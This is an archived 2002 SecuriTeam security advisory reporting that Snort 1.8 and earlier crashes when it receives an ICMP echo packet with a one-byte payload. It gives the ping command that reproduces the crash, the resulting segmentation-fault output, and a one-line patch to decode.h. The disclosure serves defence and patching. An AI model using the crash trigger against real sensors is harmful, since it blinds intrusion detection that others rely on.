[UNIX] Snort Core Dump Vulnerability
From: support@securiteam.comDate: 01/20/02
- Previous message: support@securiteam.com: "[TOOL] NGSSniff, RAW_SOCKET Packet Sniffer"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sun, 20 Jan 2002 19:02:48 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Snort Core Dump Vulnerability
------------------------------------------------------------------------
SUMMARY
It is possible to cause <http://www.snort.org/> Snort, an open source
network intrusion detection tool, to core dump by sending it an extremely
small ICMP ECHO packet.
DETAILS
Vulnerable systems:
Snort version 1.8 and prior (without the patch)
Example:
Run snort:
# snort -dev host 192.168.0.3 and 192.168.0.1
Ping 192.168.0.1 from 192.168.0.3 within one data in payload:
# ping -c 1 -s 1 192.168.0.1
Snort's output showed below:
-*> Snort! <*-
Version 1.8.3 (Build 88)
By Martin Roesch (roesch@sourcefire.com, www.snort.org)
01/10-11:34:43.898282 0:80:AD:78:83:BB -> 0:E0:18:C4:52:76 type:0x800
len:0x2B 192.168.0.3 -> 192.168.0.1 ICMP TTL:64 TOS:0x0 ID:0 IpLen:20
DgmLen:29 DF Type:8 Code:0 ID:9435 Seq:0 ECHO
Segmentation fault (core dumped)
Patch:
--- olddecode.h Thu Jan 10 15:47:48 2002
+++ decode.h Thu Jan 10 12:15:33 2002
@@ -105,7 +105,7 @@
#define IP_HEADER_LEN 20
#define TCP_HEADER_LEN 20
#define UDP_HEADER_LEN 8
-#define ICMP_HEADER_LEN 8
+#define ICMP_HEADER_LEN 4
#define TH_FIN 0x01
#define TH_SYN 0x02
This has been committed to the Snort 1.8 branch of Snort CVS and is
included in build 90.
ADDITIONAL INFORMATION
The information has been provided by <mailto:securitymail@263.net> Sinbad
and <mailto:roesch@sourcefire.com> Martin Roesch.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[TOOL] NGSSniff, RAW_SOCKET Packet Sniffer"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- Smoothwall Firewall SNORT buffer overflow
... is using a vulnerable version of snort. ... A patch has been released for the
stable GPL 1.0 version: ... no patch has been released for the beta version GPL
2.0 Mallard. ... Snort vulnerability reference: ... (Bugtraq) - Re: need your help,thanks
... On Sun, 2004-08-29 at 18:57, Jose Maria Lopez wrote: ... > Snort used
to have a patch that was an anormality detector that could ... The patch is called
SPADE/SPICE and was written by SiliconDefense, ... (Focus-IDS) - [EXPL] JavaScript Can Write Anything to the Windows Registry
... Microsoft has released a patch for: ... ActiveX Component vulnerability,
the following is an exploit code for that ... The information in this bulletin is provided
"AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever
including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam) - [UNIX] Pine Privacy Patch
... The Pine email client allows users to define the "From:" address ... Applying
the following patch to pine 4.4 will cause Sender: ... The information in this bulletin
is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages
whatsoever including direct, indirect, incidental, consequential, loss of business profits or special
damages. ... (Securiteam) - [UNIX] phpBBs Gender Mod Allows Gaining Administrative Privileges
... * Gender Mod version 1.1.3 ... File to patch, forumroot/includes/usercp_register.php:
... The information in this bulletin is provided "AS IS" without warranty of any kind.
... In no event shall we be liable for any damages whatsoever including direct, indirect,
incidental, consequential, loss of business profits or special damages. ... (Securiteam)
